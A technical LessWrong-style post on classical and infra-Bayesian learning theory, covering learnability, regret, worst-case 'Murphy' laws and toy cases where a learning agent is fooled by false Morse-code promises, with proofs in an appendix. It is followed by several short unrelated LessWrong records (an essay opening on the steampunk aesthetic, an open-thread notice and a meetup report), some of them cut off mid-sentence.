The agent dutifully plays Y until the 1000th turn. Then the promised reward of long strings of 0s doesn't arrive, instead a new Morse-code starts repeating: "Sorry, I lied last time, but I'm telling the truth now, promise! If you play Y until the 10000th turn, you will be rewarded with 10000 observations 0!" And so on.
Will the agent fall for that? Depends on the prior. It can have a prior according to which, for every n, a hypothesis of the form "I get lots of Morse-code warning signs until turn 10^n, and if I comply, I get the promised reward of 10^n" has relatively high prior probability, while the Morse-code appearing has low probability according to all other hypotheses. In that case, seeing the Morse-code can make the agent comply again and again.
After some time, the promise of future reward becomes less appealing because of the time discount rate. When exactly? The agent needs to take an action now at time t that causes 1 loss now, but will lead to 10 reward at time 10t if the "Morse-code tells the truth" hypothesis is true, which can have probability at least 1/2 given the right prior, because every other hypothesis is very unlikely after observing the repetition of the Morse-code a few times. The agent takes the loss now if γ^{9t} > 1/5, in other words while t < −ln5/(9 lnγ).
For γ close to 1, lnγ is approximately γ−1. So the agent will take the bait until approximately turn t = ln5/(9(1−γ)), which is a ln5/9 fraction of its expected lifespan, so falling for the trap this long causes a non-negligible regret.
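A small numeric check of this threshold (a sketch; the 1/2 posterior and the 10x payoff are the assumptions of the story above):

```python
import math

def last_bait_turn(gamma):
    """Largest t with 5 * gamma**(9 * t) > 1, i.e. the last turn at which
    complying is still worth it under the story's assumptions."""
    return math.floor(-math.log(5) / (9 * math.log(gamma)))

for gamma in (0.99, 0.999, 0.9999):
    t = last_bait_turn(gamma)
    lifespan = 1 / (1 - gamma)
    print(gamma, t, t / lifespan)  # the ratio stays near ln(5)/9 ~= 0.179
```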
We already knew that if the hypothesis class contains traps (possibilities that a finite string of actions has indefinite, irrevocable consequences), then the agent can fail to learn the hypothesis class. But note that that's not the case here: none of the considered hypotheses are traps, as none of them assumes irrevocable consequences of actions; a particular hypothesis just posits that some actions have consequences that last 10^n turns into the future. That's not really a trap: as γ→1, its effect becomes negligible.
So the hypothesis class H itself is learnable, but the environment e that repeatedly produces false Morse-codes is not in H, so we have no guarantee that a Bayes-optimal policy of H would work well in e, and indeed, for certain priors over H, the Bayes-optimal policy will play the suboptimal action Y for most of its life when placed in environment e.
Can Solomonoff predict the even bits?
-------------------------------------
It seems that the previous example needed a contrived prior. Can similar anomalies occur with a more natural, Solomonoff prior? Intuitively it feels less likely: the hypotheses predicting Morse-codes warning of true consequences shouldn't have too big prior probabilities, and more importantly, they shouldn't have a bigger prior probability than them conveying exactly the wrong message: maybe you will get a reward of a long string of 0s if you do the opposite of the message and play X!
Lattimore, Hutter and Gavane investigate a closely related question in their 2011 paper [Universal Prediction of Selected Bits](https://arxiv.org/abs/1107.5531). They take a simpler case than the one we looked at: The agent already knows that the environment is oblivious, it's a simple sequence prediction task. The agent starts with a Solomonoff prior over computable binary sequences, then it updates on the bits observed so far, and based on this, makes a prediction for the next bit in every step.
The sequence it observes has 0 on every even bit, however the odd bits follow an arbitrary pattern that's not even necessarily computable. Still, any human would figure out the simple rule about the even bits, so we would hope that Solomonoff induction, which is supposed to be the Idealized Sequence Predictor, can also do that.
Let pi be the probability the agent gives for bit 2i being 0 after it has observed all the previous bits. Is it true that, for all sequences in which every even bit is 0,
limi→∞ pi = 1?
I could have imagined the answer being "No": the even bits are always 0, while the odd bits always contain a Morse-code like "The bit 2n will be an exception!", always changing the prediction to a bigger n immediately after the last prediction failed. Maybe something like this could deceive the Solomonoff induction to occasionally, on these prophesied 2n bits, predict low probability for 0, in which case the limit wouldn't be 1.
Long story short, it follows as a special case from Theorem 10 of the paper that Solomonoff[[2]](#fn5s5jqffnbvu) can't be fooled like that, and it does in fact always give close to 1 probability of 0 on the even bits, given long enough time.
Okay, and what happens if the even bits are not deterministically 0, but have value 1 with probability 20%, and have value 0 with probability 80%, independently of each other and of the odd bits? Will pi converge to 80% with probability 1 for any given sequence on the odd bits?
The answer is that we don't know; this is a special case of Open Question 1 from the paper. My personal conjecture is yes, but it's probably hard to prove and remains a gap in our knowledge about Solomonoff induction's performance in non-realizable settings.
Would an expected utility maximizer using Solomonoff induction also learn to always play X in the previous example? The example requires the agent to have non-oblivious environments in its hypothesis class, but there still shouldn't be traps according to any of its hypotheses, otherwise the class wouldn't be learnable. So we should restrict the Solomonoff prior to a set of interactive Turing machines that don't contain traps, for the question to make sense at all. I haven't thought deeply about what would be natural choices for such sets, and I remain genuinely unsure whether a Solomonoff-based expected utility maximizer would learn to always play X in every oblivious environment. Lattimore, Hutter and Gavane's similar result indicates yes, but the possibility of large future rewards might make a big difference between interactive expected utility maximization and simple sequence prediction.
Infra-Bayesian learning theory
==============================
The creation of [infra-Bayesianism](https://www.lesswrong.com/posts/zB4f7QqKhBHa5b37a/introduction-to-the-infra-bayesianism-sequence) was motivated by these examples. When we are constructing a universal model of learning agents, it shouldn't be a hard theorem that the agent is able to learn that every second bit is 0. This should be obvious! After all, that's how humans learn about the world: we don't have a full probability distribution over what the world might be like down to the atomic level, but we do learn a few regularities about our environment, like every time we touch the hot stove, it burns our hand. After we learn this law about the world, we might still have huge uncertainties about the rest of the universe, but we still stop touching that damn stove.
Motivated by this intuition, the hypothesis class of an IB learning agent is not made of environments, but laws. (Important note: laws were named belief functions in the original Infra-Bayesianism sequence, but were later renamed.) A law describes some regularities of the environment, while the agent can remain in Knightian uncertainty about everything else. For simplicity, we will focus on so-called crisp infra-POMDP laws, which is a general enough definition for our purposes now.
First, a quick notation:
**Notation 15** (□X).
*For a space X, the notation □X denotes the space of closed convex subsets of ΔX (the space of probability distributions over X).*
**Definition 16** (Crisp infra-POMDP laws).
*A crisp infra-POMDP law Θ is specified by a space of states S, an initial state s0∈S, an observation function b:S→O and a transition kernel T:S×A→□S. The law is that in every turn, the distribution of the next state must be in the closed convex set T(s,a)∈□S, where s is the current state and a is the action of the agent that was just taken. The agent can't observe which state it's in, but after every turn, it observes b(s′)∈O, where s′ is the current state at the end of the turn.*
From now on, whenever we write "law" we mean "crisp infra-POMDP law", at least in this post.
Given a law Θ, the agent tries to minimize its loss in the worst case scenario allowed by Θ. We personify the "worst case scenario" as the malevolent deity, Murphy. We assume that Murphy knows the policy π of our agent, and in every turn, chooses a distribution from T(s,a) in a way that maximizes the expected loss of the agent over its lifespan, given the agent's policy.
**Definition 17** (Expected loss with respect to a law).
*Given an infra-POMDP law Θ,*
EΘ(π)(Lγ) = maxψ E(π,ψ,Lγ),
*where ψ:S×V→T(s,a)⊂ΔS is a counter-policy of Murphy to the agent's policy π: Murphy can decide, given the history so far and the state they are in, which distribution inside T(s,a) the next state should be sampled from. (V=(A×O)∗×A denotes the set of finite histories.)*
So given a law Θ, our agent wants to choose the policy that minimizes this worst-case EΘ(π)(Lγ).
How does learning happen?
Analogously with the classical reinforcement learning agent, the infra-Bayesian RL agent also has a hypothesis class, but made not of environments but of laws. It aims to have a policy that has low infra-Bayesian regret with respect to every law in its hypothesis class.
**Definition 18** (Regret in infra-Bayesianism).
*A policy π's regret with respect to a law Θ, given the loss function Lγ, is*
R(π,Θ,Lγ) = EΘ(π)(Lγ) − minπ∗ EΘ(π∗)(Lγ).
Analogously with the classical case, we can also define learnability:
**Definition 19** (Infra-Bayesian learnability).
*A hypothesis class H is said to be learnable if there exists a family of policies {πγ} such that for every law Θ∈H,*
limγ→1 R(πγ,Θ,Lγ) = 0.
The analog of Theorem [4](#countable) applies to infra-Bayesian hypothesis classes too: if every finite subset of a countable H is learnable, then H itself is learnable. The proof is exactly the same.
Again, not every hypothesis class is learnable, because every environment is a law, so the previous counter-example with the two environments sending the agent to Heaven or Hell based on its first move is a good counter-example here too. But again, many natural hypothesis classes turn out to be learnable. And compared to classical learning theory, we can have more hope that a policy that has low regret with respect to some infra-Bayesian hypotheses, will behave reasonably in every environment. After all, if it's prepared to do well in a world governed by a malevolent deity, then a real environment shouldn't be worse.
To understand these concepts better, let's restrict our attention to a special type of laws: crisp infra-bandit laws.
**Definition 20** (Infra-bandit).
*A crisp infra-bandit is a function B:A→□O.*
An example of a crisp infra-bandit is: "If the agent takes action X, then the probability of observation 1 in that turn is between 17% and 31%. If the agent takes action Y, then the probabilities of observations 2 and 3 are equal in that turn." We can check that in this example, B(X) and B(Y) are both closed convex sets of distributions.
Moreover, it's easy to see that every infra-bandit law is an infra-POMDP: Take an S such that b is a bijection between S and O, and let T(s,a)=B(a) for all s∈S and a∈A.
Given an infra-bandit law, the agent needs to prepare for the worst case scenario, that is, playing against Murphy, who is only constrained by the infra-bandit law.
After our agent plays action a, Murphy can choose a distribution from B(a) and then an observation is sampled from that distribution. The agent wants to choose a policy that keeps its loss low when playing against Murphy.
In the example above, if observation 1 implies a huge loss compared to 2 and 3, then the agent should take action X, because then Murphy will be constrained to pick a distribution in which the probability of 1 is at most 31%. On the other hand, if the agent took action Y, then Murphy would choose the distribution in which observation 1 has probability 1.
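A minimal Python sketch of this comparison (the losses, intervals, and vertex enumeration below are just the example above; and this is only the one-turn, myopic worst case, whereas the real Murphy, as the next paragraph notes, is not myopic):

```python
LOSS = {1: 10.0, 2: 1.0, 3: 1.0}  # illustrative per-observation losses

def one_turn_worst_case(vertices):
    """Max expected loss over a crisp credal set.  Expected loss is linear,
    so over a closed convex set it is maximized at a vertex; we simply
    enumerate the vertices of the set."""
    return max(sum(p * LOSS[o] for o, p in dist.items()) for dist in vertices)

# B(X): P(obs 1) in [0.17, 0.31]; obs 2 and 3 cost the same here, so where
# the remaining mass goes doesn't matter and two vertices suffice.
bx = [{1: 0.17, 2: 0.83}, {1: 0.31, 2: 0.69}]
# B(Y): P(obs 2) = P(obs 3) = q with q in [0, 1/2], so P(obs 1) = 1 - 2q.
by = [{1: 1.0}, {2: 0.5, 3: 0.5}]

print("X:", one_turn_worst_case(bx))  # 3.79: Murphy pushes P(1) up to 0.31
print("Y:", one_turn_worst_case(by))  # 10.0: Murphy just plays observation 1
```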
It's important to note that Murphy sees the full policy of the agent, so Murphy is not required to always shortsightedly choose the distribution that will cause the biggest expected loss in that particular turn: knowing the agent's learning algorithm, Murphy can choose not to cause maximal loss for some turns if it provokes the agent to learn a wrong lesson and start acting in a way such that Murphy will be able to cause him larger harm in the future. So the agent needs to prepare a policy that's not susceptible to this kind of deception.
**Theorem 21**. *A hypothesis class H made of infra-bandits is always learnable.*
*Proof.* Again, we only prove it for countable hypothesis classes, and because of the infra-Bayesian version of Theorem [4](#countable), it's enough to prove the learnability of finite H.
To have the regret bound going to 0 as γ goes to 1, it's enough to always play the action that had the lowest average loss so far, and occasionally explore all the other actions, with frequency decreasing to 0 but never disappearing. Call this policy π.
Given an infra-bandit B∈H, the best policy would be to always play the action a for which
ca = maxθ∈B(a) Eo∼θ ℓ(o,a) is minimal, that is, the action given which Murphy can cause the smallest loss. If we call π∗ the policy of always playing action a, then for every γ, the IB expected loss is
EB(π∗)(Lγ) = ca.
On the other hand, for any ε>0, if the agent follows policy π and Murphy really is constrained by law B, then as γ→1, the agent will observe with probability approaching 1 that its average loss when playing action a is at most ca+ε. So whatever trick Murphy is playing, the action the agent is playing on its non-exploratory turns will always have an average loss so far of at most ca+ε: if it were higher than that, the agent would just switch to playing action a. This means that as γ→1, the agent's average loss will be at most ca, so
limγ→1 EB(π)(Lγ) = ca.
This means that
limγ→1 R(π,B,Lγ) = 0
for every B∈H, so the hypothesis class is learnable. ◻
We could be interested not just in learnability, but in what regret bounds are achievable given a time discount rate γ or time horizon T. For this, we would need to find the optimal rate to decrease the frequency of exploratory steps. Vanessa investigated this in a yet-unpublished paper and got similar regret bounds to the ones we have for classical bandits. However, for this post, we don't inquire further than learnability, as the focus of the post is on how much we can prove behavioral guarantees for learning policies in general environments, and my current understanding is that the exact regret bounds don't matter for the examples this post will examine.
Infra-bandits were an easy-to-understand example of infra-Bayesian learnability, but Vanessa also proved a more general result:
**Theorem 22**. *A hypothesis class H made of finite-state, communicating crisp infra-POMDP laws is learnable.*
The definition of communicating is the same as before: for any two states, the agent has a policy which ensures that he will get from one state to the other with probability 1, no matter what Murphy is doing (within the bounds of the law).
Infra-Bayes-optimal policies
----------------------------
Before we move on to examples and counterexamples, we define a few more concepts analogous to the ones in classical theory.
**Definition 23** (Bayesian regret in infra-Bayesianism).
*Given a prior distribution ζ on the hypothesis class H, the Bayesian regret of a policy π is*
EΘ∼ζ R(π,Θ,Lγ).
The analog of Theorem [12](#equivalence) is true in the infra-Bayesian setting too, with the exact same proof.
Also, analogously with the classical setting, we can look at the policy with the lowest Bayesian regret:
**Definition 24** (Infra-Bayes-optimal policy).
*Given a hypothesis class H made of laws and given a prior distribution ζ over H, the policy π is said to be infra-Bayes-optimal if it minimizes*
EΘ∼ζ EΘ(π)(Lγ).
Theorem [14](#bayes-learns) is also true here, with the exact same proof: an infra-Bayes-optimal policy with a non-dogmatic prior over a learnable hypothesis class H will learn the class H.
Similarly to the classical case, infra-Bayes-optimal policies are more likely to behave reasonably in general environments, but unfortunately it's usually computationally intractable to find them, so we would prefer to prove guarantees about policies that are not required to be optimal, just to have low regret for every law in the class.
Non-realizability and infra-Bayesian learning theory
====================================================
So, how well does infra-Bayesianism do in general environments? Let's go through the previously listed examples.
The 010101... failure mode
--------------------------
We assume that the agent's hypothesis class consists of infra-bandits.
The agent's loss function is this: if the observation is 1, it gets 10 loss; if the observation is 0, it gets 0 loss. On top of that, if it plays action X, it gets 0 loss, and if it plays action Y, it gets 1 loss.
The environment is oblivious, the observations don't depend on the agent's actions. So we would hope that the agent will learn almost never to play Y, which is a dominated action.
On the other hand, the agent can still have the policy π below that contains a failure mode:
"Start with action Y, and play action Y as long as the observation history looks like 010101... After the first deviation from this sequence, take action X ever after."
Take an infra-bandit law Θ∈H.
R(π,Θ,Lγ) = EΘ(π)(Lγ) − minπ∗ EΘ(π∗)(Lγ),
where EΘ(π)(Lγ) is the expected loss if Murphy, knowing the agent's policy, chooses the distribution in every turn, constrained only by the law Θ, in a way that maximizes the agent's overall expected loss through its life.
The infra-bandit law Θ assigns a closed convex set of probability distributions on the observations {0,1}. These distributions can be described with one variable p∈[0,1], the probability of observation 1, because then the probability of observation 0 is just 1−p. So a closed convex set of distributions is just an interval [a,b]⊂[0,1] that determines that p must be in [a,b].
If Θ(Y)=[a,b], then however Murphy chooses the distributions in each turn, by the 2n-th turn, the probability of the 0101... failure-mode history will be at most b^n(1−a)^n. If b<99/100, that is, if the maximum probability Murphy can assign to 1 is at most 99/100, then the failure-mode history staying up for long is vanishingly unlikely, and the expected regret compared to the optimal policy of always playing X is at most
(1−γ) ∑_{k=0}^∞ (99/100)^k (γ^{2k} + γ^{2k+1}) = (1−γ^2)/(1−(99/100)γ^2), which goes to 0 as γ goes to 1.
And if b>99/100, then Murphy has no reason to try tricking the agent into losing 1 each turn by playing a suboptimal strategy at the price of Murphy being generous on every second turn: no, the loss is maximized when Murphy plays 1 with the maximal possible probability at every turn and makes the agent lose 10. So the failure mode in the policy doesn't affect EΘ(π)(Lγ) much, and π's regret will be low under every law in the hypothesis class, even though it's stupid.
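The same kind of numeric sanity check as before, for the b<99/100 case (a sketch):

```python
# Check the bound (1 - gamma**2) / (1 - 0.99 * gamma**2) from above.
for gamma in (0.9, 0.99, 0.999, 0.9999):
    print(gamma, (1 - gamma**2) / (1 - 0.99 * gamma**2))
# -> 0 as gamma -> 1, though slowly: the bound is weak for moderate gamma.
```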
The square-free failure mode
----------------------------
If we broaden the hypothesis class to finite-state communicating crisp infra-POMDPs, then there will be a simple law that predicts the 010101... sequence, so the agent can't have a failure mode on that sequence anymore. But no matter how broad a hypothesis class we take, there will be sequences that are not directly encoded in any of the hypotheses, and the agent might be placed in an environment which produces such a sequence. This is the core of the non-realizability problem.
Then, the agent will be unprepared to respond to this sequence: according to all its hypotheses, this sequence can only occur if Murphy has a very strong control over which bits should appear when. But then why wouldn't Murphy just use his control to make as many observations 1s as possible, instead of using its power to trick the agent into making suboptimal moves that are relatively harmless compared to observing more 1s?
Still, this is an improvement compared to performance guarantees provided by classical learning theory. For example, let's assume that the agent's hypothesis class is made of finite-state communicating crisp infra-POMDP laws, and it encounters the sequence that's 1 on square-free indices and 0 otherwise. This was our previous example that a classical learning agent with a hypothesis class made of finite-state POMDPs couldn't handle.
Fortunately, there is a law Θ that describes this sequence in large part: "Every bit whose index is divisible by 4 or by 9 must be 0, and Murphy is unconstrained on the other bits." This is a law that can be easily formalized as a finite-state communicating crisp infra-POMDP. If Θ is in the infra-Bayesian agent's hypothesis class, it is suddenly not allowed to have a failure mode where it plays action Y if it sees the square-free sequence: if the agent had this failure mode, then under law Θ, it would be worth it for Murphy to produce the square-free sequence, thus tricking the agent into playing Y and losing 1 in every turn. Murphy's other option would be to just play observation 1 on every index not divisible by 4 or 9, but this wouldn't be much better for him than playing 1 only on the square-free indices: the difference is just a 1 − 6/π² − 1/4 − 1/9 + 1/36 ≈ 0.058 portion of the bits, so the extra average loss of 0.58 is smaller than the 1 per turn Murphy can gain by tricking the agent.
(Fun fact: the portion of [square-free](https://en.wikipedia.org/wiki/Square-free_integer) numbers from 1 to N goes to 6π2 as N goes to infinity.)
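These densities are easy to check empirically; a quick sketch (the cutoff N is arbitrary):

```python
import math

N = 10**6
square_free = [True] * (N + 1)
d = 2
while d * d <= N:                      # sieve out multiples of perfect squares
    for m in range(d * d, N + 1, d * d):
        square_free[m] = False
    d += 1

sf = sum(square_free[1:]) / N
nd = sum(1 for n in range(1, N + 1) if n % 4 and n % 9) / N
print(sf, 6 / math.pi**2)              # ~0.6079
print(nd, 1 - 1/4 - 1/9 + 1/36)        # ~0.6667
print(nd - sf)                         # ~0.058, the gap used above
```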
This means that if the agent has law Θ in its hypothesis class, then it must be prepared for this, which means it cannot have this exploitable failure mode.
How far does this logic go? If I understand correctly, this is the main hope of infra-Bayesian learning: that we can get a relatively narrow hypothesis class of laws that fits into the agent's head, but which is still broad enough that every environment we can expect the agent to encounter (what does that even mean?) is approximated well enough by one of the laws Θ that the agent can't have a failure mode on the sequence produced by the environment, because otherwise it would have non-negligible regret with respect to Θ (because if there was a failure mode for the sequence, it would be worth it for Murphy, constrained by Θ, to produce the sequence).
Whether this is the case in real life (again, what does this really mean?) and whether we can formalize this further is an open question, but this is a promising direction.
Infra-Bayes-optimal policies might also be deceived by Morse-codes
------------------------------------------------------------------
Just as in the classical case, imagine that the agent has a contrived prior that gives high probability to laws of the form "Murphy is required to advertise in Morse-code that he will give lots of observations 0 after the 10^n-th turn if I now play Y for a while, and then Murphy is required to keep his promise", but there aren't other laws in the hypothesis class that include constraints on Murphy that would require him to play Morse-codes (or those laws just have very low prior).
Then, after observing the Morse-codes, the agent will think "If Murphy is not required to do this, then the only way he can create such a sequence is by having strong control over the bits, but then why wouldn't he use that to just show a lot of 1s? The only way this makes sense is under the hypothesis that Murphy is required to do this, in which case I should play Y, because then Murphy will be required to play a long string of 0s in the future."
If we define a Solomonoff-style simplicity prior over infra-Bayesian laws, this more natural prior might get rid of this problem. But it might get rid of the problem in classical learning theory too (in fact, we know that it can predict the even bits), and I feel that the two problems are actually very similar, although the reasoning in the previous section might give us more hope in the infra-Bayesian case.
A day in the life of an IB agent
--------------------------------
The original intent of infra-Bayesian learning was that the agent doesn't need to learn every detail about its full environment to understand a simple law of nature, like that the hot stove burns his hands, so he should stop touching it.
Instead, what we got is this weird decision mechanism:
"I learned that the hot stove always burns my hand. Today it's raining outside and I just stubbed my toe, so everything in the environment that I don't have a model about is very bad, which matches my expectations that an evil deity controls the universe."
"Oh weird, the rain just stopped. Aha, I see, this is just the evil deity trying to confuse me and trick me into touching the stove. But I'm not falling for this!"
"Oh, I just found a shiny coin in my pocket. This is really unexpected, as the sunshine and the coin together are worth more for me than not burning my hand, so it can't just be for tricking me. I don't understand why and evil god would let so good things happen to a person, and I'm really confused and don't have a plan for this unlikely situation. I might as well celebrate by touching the hot stove."
This story is somewhat unfair, because this problem only occurs if enough good things happen to the agent that are not explained by any of the laws in its hypothesis class: as we have seen with the square-free example, if the agent knows a law that can model most of the good things happening, then the agent will just conclude that Murphy is mostly constrained by this law, and the little additional goodness not explained by the law is just for tricking it into touching the stove, which dissolves the agent's confusion and saves it from burning its hand. However, it's still unclear what would be a good hypothesis class of laws that can explain every good event with close enough approximation.
A proposed solution
-------------------
The best idea I heard for getting a simple hypothesis class solving this problem is a class of laws of this form: "The hot stove always burns my hand anytime I touch it. The non-stove-related events in the world on average cause at most loss c to me." Having laws like this for a lot of different values of c seems like it could solve the problem: if unmodeled things are not going the worst possible way, then the agent doesn't get confused, but thinks that the law requires Murphy to constrain its evilness in general.
Unfortunately, I don't believe there is such a simple way out. How would we define in a law that "I get on average at most c loss"? Averaged over which time frame?
We can indeed make laws specifying concrete, finite time frames, like "In every 100 turns, there must be at least 35 positive observations". But then the agent might just get into an environment in which longer and longer strings of 0s and 1s follow each other, which falsifies all these laws, in which case we are back to the point where nothing is holding back the agent from touching the stove.
The other possibility would be a law saying that throughout the agent's whole life, the overall loss must be at most c, calculated with γ time discount rate.
Unfortunately, you can't define a law like that. Laws are not supposed to include γ, which is a moving variable; encoding it in the hypotheses would break the definition of learnability.
Let's take an example of what could happen if we allowed laws including γ:
"The law is that a stove can only burn you at most 12(1−γ) times, after that it will turn things to gold."
How is an agent with γ time discount (this is similar to having a lifespan of 1/(1−γ) turns) supposed to test this hypothesis? It can only do so by spending half its life touching hot stoves. If the hypothesis was false, this is a pretty bad deal. On the other hand, if it was right, then not trying it would mean missing out on giant heaps of gold.
If the law specified 10000 turns instead of 1/(2(1−γ)), then as γ goes to 1, the hypothesis would be testable, which could make the hypothesis class containing it learnable. But if we allowed incorporating γ in the hypotheses themselves, learnability would break down.
I don't see a third way in which a law of "average c loss" could be implemented, so while I still think it's an interesting idea to potentially use later, it doesn't solve the problem by itself.
Conclusion
==========
Infra-Bayesianism is better equipped than classical learning theory to provide provable performance guarantees in general environments, but it still probably needs a very broad hypothesis class of very detailed laws that can describe the world in close-enough detail that the agent doesn't get confused when good things are happening, and provably avoids failure modes in those cases. I don't have a clear idea of exactly how all-encompassing these laws would need to be, but it's at least some improvement over classical learning theory, which only functions well if the environment's full model is included in the hypothesis class. I think the natural next step would be to describe better what kind of hypothesis class of laws is detailed enough to give good performance guarantees, but still realistic to fit into the head of an agent smaller than the environment. I feel skeptical about getting meaningful results on this question, as I believe that the word "realistic" hides a lot here and my suspicion is that our theorizing is not really useful for tackling that. But this topic belongs to my [other post](https://www.lesswrong.com/posts/StkjjQyKwg7hZjcGB/a-mostly-critical-review-of-infra-bayesianism).
Appendix: Technical proofs
==========================
**Theorem 4**.
*If every finite subset of the countable hypothesis class H is learnable, then H itself is learnable.*
*Proof.* As H is countable, we can order its elements. Let Hn denote the set of the first n elements of H. As every Hn is a learnable hypothesis class, there exists a corresponding family of policies {πγn} for all n.
Let f:(0,1)→Z+ be the function such that f(γ) is defined as the biggest number n such that
ER(πγn,e,Lγ) < 1/n for every e∈Hn.
If no such n exists, then let f(γ)=1. If all positive integers n satisfy the condition, then let f(γ)=⌊1/(1−γ)⌋.
We prove by contradiction that f(γ) goes to infinity as γ goes to 1. Assume that it's not the case: there is an M and a sequence of values γi→1 such that f(γi)<M. This would mean that for all i, there exists an ei∈HM such that ER(πγiM,ei,Lγi) ≥ 1/M. As there are only finitely many environments in HM, there must be one that appears infinitely many times in the ei sequence. Then this environment e would contradict the definition of HM's learnability, as
limγ→1 ER(πγM,e,Lγ) = 0
would not hold. Contradiction.
We can now construct a family of policies {πγ} that learns the whole class H:
πγ = πγf(γ).
For every environment eM∈H and ε>0, there exists a point r∈(0,1) such that f(γ) > max{M, 1/ε} for γ>r. This means that for γ>r, we get
ER(πγf(γ),eM,Lγ) < ε,
because eM∈Hf(γ) and 1/f(γ) < ε.
Thus, we proved for all e∈H that
limγ→1ER(πγ,e,Lγ)=0. ◻
**Theorem 12**.
*Given a countable hypothesis class H and a non-dogmatic prior ζ on H (non-dogmatic meaning that ζ(h)>0 for all h∈H), and a family of policies πγ, then*
limγ→1 Ee∼ζ ER(πγ,e,Lγ) = 0
*is equivalent to*
limγ→1 ER(πγ,e,Lγ) = 0 ∀e∈H,
*that is, the class H being learnable and π being a good learning algorithm.*
*Proof.* Suppose that
limγ→1 Ee∼ζ ER(πγ,e,Lγ) = 0.
For any hypothesis e∈H,
ER(πγ,e,Lγ) ≤ (1/ζ(e)) Ee∼ζ ER(πγ,e,Lγ),
so as the latter goes to 0, the former goes to 0 too, because we had the condition that ζ(e)>0.
Now let's suppose that
limγ→1 ER(πγ,e,Lγ) = 0 ∀e∈H.
As the loss acquirable in one turn is bounded by b, the overall loss with discount rate γ is at most (1−γ) ∑_{k=0}^∞ b γ^k = b. This means that for every policy and environment, R(πγ,e,Lγ) ≤ b.
Let H={e1,e2,…}. Because ∑_{i=1}^∞ ζ(ei) = 1, for every ε>0 there exists an N such that ∑_{i=N+1}^∞ ζ(ei) < ε/(2b).
For the first N (finitely many!) hypotheses there exists a δ such that if γ>1−δ, then
ER(πγ,ei,Lγ) < ε/2 ∀1≤i≤N.
So for any ε>0 there exists a δ such that if γ>1−δ, then
Ee∼ζ ER(πγ,e,Lγ) = ∑_{i=1}^N ζ(ei) ER(πγ,ei,Lγ) + ∑_{i=N+1}^∞ ζ(ei) ER(πγ,ei,Lγ) ≤ ε/2 + (ε/(2b))·b = ε.
With this we proved that
limγ→1Ee∼ζER(πγ,e,Lγ)=0. ◻
**Theorem 14**.
*Given a learnable, countable hypothesis class H and a non-dogmatic prior ζ on H, if we take the Bayes-optimal policy πγ for every γ∈(0,1), then this family of policies learns the hypothesis class H.*
*Proof.* Because H is learnable, there exists a family of policies {πγ∗} such that
limγ→1 ER(πγ∗,e,Lγ) = 0 ∀e∈H.
By Theorem [12](#equivalence), this is equivalent to
limγ→1 Ee∼ζ ER(πγ∗,e,Lγ) = 0.
πγ is the Bayes-optimal policy for every γ∈(0,1), given the prior ζ; in particular, it accumulates at most as much loss in expectation as πγ∗. Thus,
limγ→1 Ee∼ζ ER(πγ,e,Lγ) = 0.
By Theorem [12](#equivalence), this is equivalent to
limγ→1 ER(πγ,e,Lγ) = 0 ∀e∈H.
Thus, the Bayes-optimal family of policies {πγ} learns the hypothesis class H. ◻
1. **[^](#fnreftvwwxz1dies)**See "Reinforcement learning in POMDPs without resets" (Even-Dar et al., 2005), Theorem 4.1.
2. **[^](#fnref5s5jqffnbvu)**A normalized version of Solomonoff, to be more precise. |
f21ba697-4c34-4aad-a865-e344ac9c051b | trentmkelly/LessWrong-43k | LessWrong | The Steampunk Aesthetic
Epistemic Status: Poetry. More confident about Linux than I have a right to be.
Last year, some friends wanted to buy a boat to live on, because the Bay Area is hella expensive. They acquired a tugboat, in Alaska. I was among a few people who helped them pilot it south.
I currently do not have enough information to know whether the boat turned out to be a good idea, but in the meanwhile I gained what you might call (if you'll pardon the phrase) an intuitive, gears level understanding* of the Steampunk Aesthetic.
(My dad tried to teach me this when I was little. Sorry I didn't get it at the time, Dad)
i. Aesthetics of Abstraction
The Apple Aesthetic is clean, smooth, and magical.
You hold a glowing rectangle in your hand, formed as solid and opaque as the monolith from 2001: A Space Odyssey. You touch the rectangle, and things happen. You can learn to communicate with a little homunculus inside named Siri and ask her for favors, and if you phrase the words just right, perhaps she might grant your wish.
The rectangle has secrets, but you are not meant to pry into them too deeply, and if you try, forces from beyond will thwart you in ways subtle and unsubtle.
If your rectangle breaks, you cannot fix it. You must take it to the Apple Priests in their white halls of power, lit by shining icons. They will secret your rectangle away, work their arcane power on it and return it to you (or perhaps leave you another rectangle in its place).
The Linux Aesthetic is magical too, but of a different sort.
There are arcane languages you can learn, but they do not hold your hand. You either know the words of power, or you do not. Most ways of speaking the words of power are so wrong that nothing happens. Worse is to be almost right, and yet so wrong that you undo entire chapters of your life.
You may borrow scrolls from wizards more powerful than you, but god help you if you speak their words without understanding what exactly they mean. Read one scroll blindly, and fate m |
1bae99bc-f607-4313-a9d9-aeae14c40a45 | trentmkelly/LessWrong-43k | LessWrong | Open thread, September 22-28, 2014
If it's worth saying, but not worth its own post (even in Discussion), then it goes here.
Notes for future OT posters:
1. Please add the 'open_thread' tag.
2. Check if there is an active Open Thread before posting a new one. (Immediately before; refresh the list-of-threads page before posting.)
3. Open Threads should be posted in Discussion, and not Main.
4. Open Threads should start on Monday, and end on Sunday. |
54c865ac-62fa-484d-9229-20d901c04a52 | StampyAI/alignment-research-dataset/blogs | Blogs | New report: “Non-omniscience, probabilistic inference, and metamathematics”
UC Berkeley student and MIRI research associate Paul Christiano has released a new report: “[Non-omniscience, probabilistic inference, and metamathematics](https://intelligence.org/files/Non-Omniscience.pdf).”
Abstract:
> We suggest a tractable algorithm for assigning probabilities to sentences of first-order logic and updating those probabilities on the basis of observations. The core technical difficulty is relaxing the constraints of logical consistency in a way that is appropriate for bounded reasoners, without sacrificing the ability to make useful logical inferences or update correctly on evidence.
>
>
> Using this framework, we discuss formalizations of some issues in the epistemology of mathematics. We show how mathematical theories can be understood as latent structure constraining physical observations, and consequently how realistic observations can provide evidence about abstract mathematical facts. We also discuss the relevance of these ideas to general intelligence.
>
>
What is the relation between this new report and Christiano et al.’s earlier “[Definability of truth in probabilistic logic](https://intelligence.org/files/DefinabilityTruthDraft.pdf)” report, discussed by John Baez [here](http://johncarlosbaez.wordpress.com/2013/03/31/probability-theory-and-the-undefinability-of-truth/)? In this new report, Paul aims to take a broader look at the interaction between probabilistic reasoning and epistemological issues, from an algorithmic perspective, before continuing to think about reflection and truth in particular.
The post [New report: “Non-omniscience, probabilistic inference, and metamathematics”](https://intelligence.org/2014/06/23/new-report-non-omniscience-probabilistic-inference-metamathematics/) appeared first on [Machine Intelligence Research Institute](https://intelligence.org). |
5885f147-b9cc-4416-a6cb-93e73fbe5496 | trentmkelly/LessWrong-43k | LessWrong | Meetup report: London LW paranoid debating session
A photo from a (different) recent LW London meetup
Cross-posted from my blog.
